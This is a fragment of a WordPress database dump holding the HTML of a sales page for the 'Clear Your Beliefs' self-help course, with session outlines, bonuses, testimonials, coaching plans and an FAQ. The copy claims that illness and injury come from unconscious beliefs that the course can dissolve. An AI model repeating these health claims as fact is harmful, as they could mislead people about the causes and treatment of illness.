src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?\r\n\r\nIn this interview, Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this bonus interview with internationally acclaimed author and teacher Anodea Judith.  Anodea is one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and <em>The BeliefCloset Process</em> was developed for their workshop on manifestation, taught around the world to over 1,000 people.\r\n\r\n</div>\r\n<div class="module_body">Their book is a step-by-step manual for turning any dream into a reality by taking any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 19:20:34', '2014-06-18 00:20:34', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(978, 2, '2014-06-17 19:00:49', '2014-06-18 00:00:49', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do 